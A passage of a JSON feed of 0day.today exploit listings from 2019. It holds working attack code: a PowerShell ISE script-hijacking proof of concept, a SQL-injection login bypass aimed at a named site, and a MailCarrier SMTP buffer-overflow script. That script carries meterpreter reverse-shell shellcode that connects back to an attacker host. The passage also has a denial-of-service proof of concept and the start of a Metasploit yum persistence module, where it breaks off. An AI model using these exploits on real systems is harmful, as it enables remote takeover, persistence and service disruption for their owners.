script hijacking condition. Note, the last letter is a number \"1\" not a lowercase \"L\".\r\n\r\nOther things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols.\r\nPowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.\r\n\r\nThese chars also get the job done:\r\n\"$\" \"_\" \"#\" \"^\" plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1\r\n\r\n[Hello].ps1 will execute this instead =====> h.ps1\r\n\r\nDashes \"-\" throw the following error: \"The specified wildcard character pattern is not valid: [Hello-World].ps1\" when pointing to\r\nanother PS file named -.ps1 and seems to treat it sort of like a meta-character.\r\n\r\n[pw3d].ps1 <===== expected to execute\r\n\r\n3.ps1 <===== actually executed\r\n\r\nThis exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display \"trusted\" code\r\nin ISE that is expected to run. However, when the user debugs the script a different script gets executed.\r\nInterestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.\r\n\r\nUser interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. \r\nAgain, this exploit takes advantage of \"trust\" where users can see and read the code and will trust it as everything looks just fine and\r\nyet ... still they get PWNED!.\r\n\r\nTested successfully on Win7/10\r\n\r\nLong live user interaction! lol...\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=T2I_-iUPaFw\r\n\r\n\r\n[Exploit/POC]\r\nAfter opening PS files in ISE, set the execution policy so can test without issues.\r\nset-executionpolicy unrestricted -force\r\n\r\nPS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd.\r\n\r\nset-executionpolicy unrestricted -force process\r\nChoose 'R' to run once.\r\n\r\nBelow Python script will create two .ps1 files to demonstrate the vulnerable condition.\r\nExamine the code, what does it say? it reads... Write-output \"Hello World!\"... now Run it...\r\n\r\nBAM! other PS script executes!.\r\n\r\n\r\n#PowerShell ISE 0day Xploit\r\n#ZDI-CAN-8005\r\n#ZDI CVSS: 7.0\r\n#hyp3rlinx\r\n#ApparitionSec\r\n\r\n\r\nfname1=\"[HelloWorldTutoria1].ps1\" #Expected code to run is 'HelloWorld!'\r\nfname2=\"1.ps1\" #Actual code executed is calc.exe for Poc\r\nevil_code=\"start calc.exe\" #Edit to suit your needs.\r\nc=0\r\npayload1='Write-Output \"Hello World!\"'\r\npayload2=evil_code+\"\\n\"+'Write-Output \"Hello World!\"'\r\n\r\ndef mk_ps_hijack_script():\r\n global c\r\n c+=1\r\n f=open(globals()[\"fname\"+str(c)],\"wb\")\r\n f.write(globals()[\"payload\"+str(c)])\r\n f.close()\r\n if c<2:\r\n mk_ps_hijack_script()\r\n \r\n\r\nif __name__==\"__main__\":\r\n mk_ps_hijack_script()\r\n print \"PowerShell ISE Xploit 0day Files Created!\"\r\n print \"Discovery by hyp3rlinx\"\r\n print \"ZDI-CAN-8005\"\n\n# 0day.today [2019-05-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32642"}, {"lastseen": "2019-05-03T15:55:51", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32644", "href": "https://0day.today/exploit/description/32644", "title": "Instagram Auto Follow - Authentication #Bypass Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass\r\n# Exploit Author: Veyselxan\r\n# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4\r\n\r\n# Tested on: Linux\r\nhttps://eowynlab.cf/autobot-follow/index.php\r\n\r\n\r\nusername: admin' or '1'='1\r\n\r\nPassword: admin' or '1'='1\n\n# 0day.today [2019-05-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32644"}, {"lastseen": "2019-05-03T21:57:18", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "1337DAY-ID-32648", "href": "https://0day.today/exploit/description/32648", "title": "MailCarrier 2.51 HELP Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in \"HELP\" command(SMTP)\r\n# Exploit Author: Vinaykumar Yennam and Dheepshika Raghunathan \r\n# Vendor Homepage: https://www.tabslab.com/\r\n# Version: 2.51\r\n# Software Link: N.A\r\n# Tested on: Windows XP Prof SP3 ENG x86\r\n# CVE: TBC from Mitre\r\n# Created for the ENPM697 Project\r\n# POC\r\n# 1.) Change ip and port in code\r\n# 2.) Run script against target, set up a listener and meterpreter reverse shell will connect to your machine.\r\n\r\nimport socket\r\nimport sys\r\n\r\nhost = \"192.168.241.135\"\r\nport = 25\r\n\r\n\r\n\r\npattern = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2Gm3Gm4Gm5Gm6Gm7Gm8Gm9Gn0Gn1Gn2Gn3Gn4Gn5Gn6Gn7Gn8Gn9Go0Go1Go2Go3Go4Go5Go6Go7Go8Go9Gp0Gp1Gp2Gp3Gp4Gp5Gp6Gp7Gp8Gp9Gq0Gq1Gq2Gq3Gq4Gq5Gq6Gq7Gq8Gq9Gr0Gr1Gr2Gr3Gr4Gr5Gr6Gr7Gr8Gr9Gs0Gs1Gs2Gs3Gs4Gs5Gs6Gs7Gs8Gs9Gt0Gt1Gt2Gt3Gt4Gt5Gt6Gt7Gt8Gt9Gu0Gu1Gu2Gu3Gu4Gu5Gu6Gu7Gu8Gu9Gv0Gv1Gv2Gv3Gv4Gv5Gv6Gv7Gv8Gv9Gw0Gw1Gw2Gw3Gw4Gw5Gw6Gw7Gw8Gw9Gx0Gx1Gx2Gx3Gx4Gx5Gx6Gx7Gx8Gx9Gy0Gy1Gy2Gy3Gy4Gy5Gy6Gy\"\r\n\r\njunk1 = \"A\" * 5091\r\n\r\nEIP = \"\\x18\\x35\\xe1\\x4d\" #JMP ESP in msoda15.dll\r\n\r\n\r\n#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.241.132 LPORT=4444 -e x86/alpha_mixed -b \"\\x00\\xd5\\x0a\\x0d\\x1a\\x03\" -f c\r\nshellcode = (\"\\x89\\xe3\\xd9\\xee\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x6b\"\r\n\"\\x4c\\x59\\x78\\x4b\\x32\\x63\\x30\\x75\\x50\\x45\\x50\\x65\\x30\\x4f\\x79\"\r\n\"\\x4b\\x55\\x34\\x71\\x59\\x50\\x35\\x34\\x4e\\x6b\\x36\\x30\\x54\\x70\\x6c\"\r\n\"\\x4b\\x61\\x42\\x36\\x6c\\x6e\\x6b\\x33\\x62\\x74\\x54\\x4c\\x4b\\x63\\x42\"\r\n\"\\x55\\x78\\x76\\x6f\\x4d\\x67\\x70\\x4a\\x74\\x66\\x44\\x71\\x39\\x6f\\x6e\"\r\n\"\\x4c\\x47\\x4c\\x63\\x51\\x31\\x6c\\x64\\x42\\x54\\x6c\\x51\\x30\\x7a\\x61\"\r\n\"\\x6a\\x6f\\x74\\x4d\\x56\\x61\\x39\\x57\\x6d\\x32\\x4c\\x32\\x52\\x72\\x70\"\r\n\"\\x57\\x6e\\x6b\\x56\\x32\\x46\\x70\\x4c\\x4b\\x42\\x6a\\x65\\x6c\\x4e\\x6b\"\r\n\"\\x50\\x4c\\x76\\x71\\x73\\x48\\x6a\\x43\\x73\\x78\\x45\\x51\\x68\\x51\\x43\"\r\n\"\\x61\\x4c\\x4b\\x61\\x49\\x51\\x30\\x56\\x61\\x38\\x53\\x6c\\x4b\\x33\\x79\"\r\n\"\\x32\\x38\\x4b\\x53\\x34\\x7a\\x70\\x49\\x6c\\x4b\\x75\\x64\\x6e\\x6b\\x53\"\r\n\"\\x31\\x38\\x56\\x65\\x61\\x4b\\x4f\\x4c\\x6c\\x49\\x51\\x4a\\x6f\\x56\\x6d\"\r\n\"\\x47\\x71\\x5a\\x67\\x46\\x58\\x39\\x70\\x70\\x75\\x39\\x66\\x57\\x73\\x51\"\r\n\"\\x6d\\x6c\\x38\\x45\\x6b\\x51\\x6d\\x45\\x74\\x71\\x65\\x79\\x74\\x66\\x38\"\r\n\"\\x6e\\x6b\\x43\\x68\\x37\\x54\\x75\\x51\\x5a\\x73\\x50\\x66\\x6c\\x4b\\x36\"\r\n\"\\x6c\\x42\\x6b\\x6e\\x6b\\x72\\x78\\x45\\x4c\\x67\\x71\\x59\\x43\\x4e\\x6b\"\r\n\"\\x55\\x54\\x6e\\x6b\\x55\\x51\\x5a\\x70\\x6d\\x59\\x77\\x34\\x31\\x34\\x45\"\r\n\"\\x74\\x73\\x6b\\x33\\x6b\\x61\\x71\\x61\\x49\\x43\\x6a\\x72\\x71\\x59\\x6f\"\r\n\"\\x79\\x70\\x43\\x6f\\x63\\x6f\\x61\\x4a\\x4e\\x6b\\x77\\x62\\x7a\\x4b\\x6c\"\r\n\"\\x4d\\x51\\x4d\\x50\\x68\\x75\\x63\\x56\\x52\\x75\\x50\\x33\\x30\\x43\\x58\"\r\n\"\\x42\\x57\\x52\\x53\\x44\\x72\\x43\\x6f\\x43\\x64\\x30\\x68\\x52\\x6c\\x54\"\r\n\"\\x37\\x66\\x46\\x43\\x37\\x6c\\x49\\x6d\\x38\\x4b\\x4f\\x38\\x50\\x4d\\x68\"\r\n\"\\x6e\\x70\\x76\\x61\\x63\\x30\\x55\\x50\\x71\\x39\\x68\\x44\\x63\\x64\\x52\"\r\n\"\\x70\\x42\\x48\\x46\\x49\\x4d\\x50\\x30\\x6b\\x55\\x50\\x49\\x6f\\x4b\\x65\"\r\n\"\\x52\\x4a\\x56\\x6a\\x63\\x58\\x69\\x50\\x4c\\x68\\x48\\x71\\x4d\\x54\\x33\"\r\n\"\\x58\\x45\\x52\\x33\\x30\\x32\\x31\\x71\\x4c\\x4c\\x49\\x79\\x76\\x52\\x70\"\r\n\"\\x66\\x30\\x56\\x30\\x62\\x70\\x43\\x70\\x72\\x70\\x63\\x70\\x66\\x30\\x70\"\r\n\"\\x68\\x7a\\x4a\\x74\\x4f\\x69\\x4f\\x6d\\x30\\x49\\x6f\\x68\\x55\\x4a\\x37\"\r\n\"\\x30\\x6a\\x72\\x30\\x70\\x56\\x61\\x47\\x45\\x38\\x6a\\x39\\x6e\\x45\\x33\"\r\n\"\\x44\\x33\\x51\\x59\\x6f\\x7a\\x75\\x4d\\x55\\x4b\\x70\\x33\\x44\\x37\\x7a\"\r\n\"\\x49\\x6f\\x72\\x6e\\x45\\x58\\x70\\x75\\x78\\x6c\\x59\\x78\\x53\\x57\\x45\"\r\n\"\\x50\\x63\\x30\\x73\\x30\\x73\\x5a\\x33\\x30\\x30\\x6a\\x76\\x64\\x52\\x76\"\r\n\"\\x73\\x67\\x62\\x48\\x44\\x42\\x4b\\x69\\x68\\x48\\x71\\x4f\\x69\\x6f\\x39\"\r\n\"\\x45\\x6d\\x53\\x4c\\x38\\x53\\x30\\x61\\x6e\\x70\\x36\\x6e\\x6b\\x47\\x46\"\r\n\"\\x63\\x5a\\x67\\x30\\x71\\x78\\x43\\x30\\x36\\x70\\x63\\x30\\x75\\x50\\x56\"\r\n\"\\x36\\x43\\x5a\\x33\\x30\\x30\\x68\\x42\\x78\\x6c\\x64\\x62\\x73\\x6a\\x45\"\r\n\"\\x79\\x6f\\x58\\x55\\x4c\\x53\\x56\\x33\\x43\\x5a\\x67\\x70\\x70\\x56\\x36\"\r\n\"\\x33\\x51\\x47\\x62\\x48\\x65\\x52\\x4e\\x39\\x69\\x58\\x73\\x6f\\x69\\x6f\"\r\n\"\\x79\\x45\\x6c\\x43\\x49\\x68\\x33\\x30\\x51\\x6d\\x34\\x68\\x36\\x38\\x75\"\r\n\"\\x38\\x55\\x50\\x61\\x50\\x43\\x30\\x47\\x70\\x52\\x4a\\x45\\x50\\x66\\x30\"\r\n\"\\x63\\x58\\x64\\x4b\\x54\\x6f\\x34\\x4f\\x34\\x70\\x59\\x6f\\x68\\x55\\x46\"\r\n\"\\x37\\x63\\x58\\x30\\x75\\x32\\x4e\\x30\\x4d\\x65\\x31\\x59\\x6f\\x6e\\x35\"\r\n\"\\x53\\x6e\\x63\\x6e\\x69\\x6f\\x76\\x6c\\x67\\x54\\x74\\x4f\\x6f\\x75\\x72\"\r\n\"\\x50\\x6b\\x4f\\x79\\x6f\\x69\\x6f\\x7a\\x49\\x6d\\x4b\\x6b\\x4f\\x39\\x6f\"\r\n\"\\x49\\x6f\\x65\\x51\\x6f\\x33\\x47\\x59\\x4b\\x76\\x53\\x45\\x6b\\x71\\x4a\"\r\n\"\\x63\\x6f\\x4b\\x6c\\x30\\x6c\\x75\\x69\\x32\\x46\\x36\\x61\\x7a\\x57\\x70\"\r\n\"\\x32\\x73\\x59\\x6f\\x7a\\x75\\x41\\x41\")\r\n\r\nnops = \"\\x90\"*20\r\n\r\n#junk1 depends on the length of path of the executable. Modify 5091 in junk1 accordingly.\r\n#Alternatively, you can use pattern to calculate the offset\r\n#evil_buffer = \"HELP \" + pattern + \"\\r\\n\"\r\n\r\nevil_buffer = \"HELP \" + junk1 + EIP + nops + shellcode + \"\\r\\n\"\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n\r\ntry:\r\n sock.connect((host,port))\r\n print (\"Sending evil buffer to target machine.\")\r\n sock.send(evil_buffer)\r\n print(\"Evil buffer sent. Check for reverse shell.\")\r\n print(\"Exploit by hashs3v3n!\")\r\n sock.close()\r\n\r\nexcept:\r\n print(\"Error in socket!\")\n\n# 0day.today [2019-05-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32648"}, {"lastseen": "2019-05-01T23:55:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32629", "href": "https://0day.today/exploit/description/32629", "title": "SpotAuditor 5.2.6 - Name Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: www.nsauditor.com \r\n#Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe\r\n#Tested Version: 5.2.6\r\n#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: Spotauditor_name_5.2.6.py\r\n#2.- Open Spotauditor_name.txt and copy content to clipboard\r\n#3.- Open SpotAuditor\r\n#4.- Select \"Register\" > \"Enter Registration Code...\"\r\n#5.- In \"Name\" paste Clipboard\r\n#6.- In Key type \"test\"\r\n#7.- Click \"Ok\"\r\n#8.- Crarshed\r\n \r\ncod = \"\\x41\" * 300\r\n \r\nf = open('Spotauditor_name.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32629"}, {"lastseen": "2019-05-01T23:55:37", "bulletinFamily": "exploit", "description": "This Metasploit module will run a payload when the package manager is used. No handler is run automatically so you must configure an appropriate exploit/multi/handler to connect. Module modifies a yum plugin to launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/ will show what plugins are currently enabled on the system.", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32627", "href": "https://0day.today/exploit/description/32627", "title": "Yum Package Manager Persistence Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Linux::System\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Yum Package Manager Persistence',\r\n 'Description' => %q(\r\n This module will run a payload when the package manager is used. No\r\n handler is ran automatically so you must configure an appropriate\r\n exploit/multi/handler to connect. Module modifies a yum plugin to\r\n launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/\r\n will show what plugins are currently enabled on the system.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => ['Aaron Ringo'],\r\n 'Platform' => ['linux', 'unix'],\r\n 